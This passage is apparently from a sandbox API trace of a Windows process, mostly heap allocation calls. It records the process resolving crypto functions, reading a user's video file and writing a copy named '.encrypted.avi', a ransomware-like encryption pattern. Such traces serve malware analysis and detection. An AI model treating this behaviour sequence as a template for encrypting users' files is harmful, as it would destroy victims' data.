1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0041.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0041.691] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.691] CryptDestroyHash (hHash=0x7c2100) returned 1 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2hbnq.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.693] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.693] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2hbnq.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0041.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.694] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.694] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0041.697] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4221, lpOverlapped=0x0) returned 1 [0041.697] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14221) returned 0xac2018 [0041.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0041.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14221) returned 0x935008 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.701] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14221) returned 0xac2018 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.701] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.701] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.702] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14221) returned 0xac2018 [0041.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0041.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14221) returned 0x949238 [0041.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0041.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.704] RtlAllocateHeap (HeapHandle=0x770000, 